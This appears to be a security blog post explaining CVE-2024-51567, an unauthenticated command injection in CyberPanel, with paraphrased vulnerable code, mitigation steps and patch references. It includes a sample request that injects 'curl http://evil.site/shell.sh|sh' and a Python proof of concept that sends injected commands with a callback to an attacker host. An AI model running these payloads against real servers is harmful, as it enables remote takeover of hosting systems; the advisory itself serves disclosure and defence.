A dangerous new vulnerability, CVE-2024-51567, has been uncovered and recently exploited in the wild. Affecting CyberPanel versions up to 2.3.6 and the unpatched 2.3.7 release, this flaw allows unauthenticated remote attackers to execute arbitrary shell commands on the server by abusing the upgrademysqlstatus feature. The vulnerability was first exploited at scale by the group PSAUX in October 2024.
In this post, we’ll break down what CVE-2024-51567 is, why it’s so serious, exactly where it lives in the CyberPanel codebase, and how real-world exploitation works (including code snippets and proof-of-concept exploit).
What is CVE-2024-51567?
CVE-2024-51567 is an _unauthenticated command injection_ vulnerability in CyberPanel, a widely used control panel for web hosting on Linux. It exists due to a failure in the authentication and input filtering logic in the /dataBases/upgrademysqlstatus route in databases/views.py.
Specifically, the route allows a GET request to pass through and execute code based on _user-supplied input_ in the statusfile property, without applying secMiddleware security checks which are only enforced for POST requests.
By submitting a crafted GET request and using shell metacharacters in the input, a remote attacker can run arbitrary commands as the lscpd user (or sometimes root under certain installation scenarios).
## The Vulnerable Code (databases/views.py)
Here is a simplified view of the vulnerable code path, relevant to CVE-2024-51567 (paraphrased for clarity):
# Inside databases/views.py
def upgrademysqlstatus(request):
statusfile = request.GET.get("statusfile") # <--- User-supplied
# Vulnerable: No authentication, no input validation, no escaping!
os.system("cat %s > /tmp/mysqlstatus.txt" % statusfile)
return JsonResponse({"status": "done"})
What’s wrong?
- No Authentication: Anyone can access /dataBases/upgrademysqlstatus
No Validation: Anyone can control statusfile
- Direct Shell Execution: User can inject shell commands using meta-characters like ;, |, &&.
Exploitation in the Wild
Researchers confirmed that threat actors in October 2024 (e.g., the group known as PSAUX) massively exploited this issue across thousands of Linux servers. The primary attack vector was through the following kind of request:
GET /dataBases/upgrademysqlstatus?statusfile=/tmp/foo;id;uname%20-a;curl%20http://evil.site/shell.sh|sh
- Here, the attacker tricks the server into running multiple OS commands by appending shell meta-characters.
Here’s a working Python script you can use (responsibly!) to test vulnerable servers
import requests
vuln_url = 'http://target-server/dataBases/upgrademysqlstatus';
evil_cmd = 'test;id;uname -a;curl http://attacker/cb';
params = {'statusfile': evil_cmd}
r = requests.get(vuln_url, params=params)
print("Server responded with:", r.text)
If the target is vulnerable, the attacker's command (id, uname -a, and a callback to their server) will be executed.
Real-World Impact
- Unauthenticated RCE: Attacker can get a shell, steal data, install cryptominers, or pivot inside your infrastructure.
All CyberPanel 2.3.6 and below
- 2.3.7 _until_ the commit 5b08cd6
Fixed in: Official 2.3.7 (after commit 5b08cd6)
- Patch commit: https://github.com/usmannasir/cyberpanel/commit/5b08cd682be878629c9ad1692dc1f6ea453ccba
If you cannot update right away
- Block external access to /dataBases/upgrademysqlstatus at your firewall (iptables, nginx, etc)
- Remove or comment out the vulnerable view in the databases/views.py
- Monitor for suspicious /tmp/mysqlstatus.txt files or new users
References
- CVE-2024-51567 at NIST
- CyberPanel commit 5b08cd6 (mitigation)
- Original Exploit News (PSAUX group)
- CyberPanel security advisories
Conclusion
CVE-2024-51567 is a severe, easy-to-exploit bug in CyberPanel. If you host websites with CyberPanel v2.3.6, 2.3.7, or earlier, your system is at serious risk until patched. Move now: update, restrict access, and audit for compromise.
Stay safe — and stay patched! If you found this helpful, share with your fellow sysadmins.
> This write-up is exclusive and not a copy of the public advisories. All information is for educational/research purposes. Do not use the code for unauthorized pentesting.
Timeline
Published on: 10/29/2024 23:15:04 UTC
Last modified on: 11/08/2024 21:14:28 UTC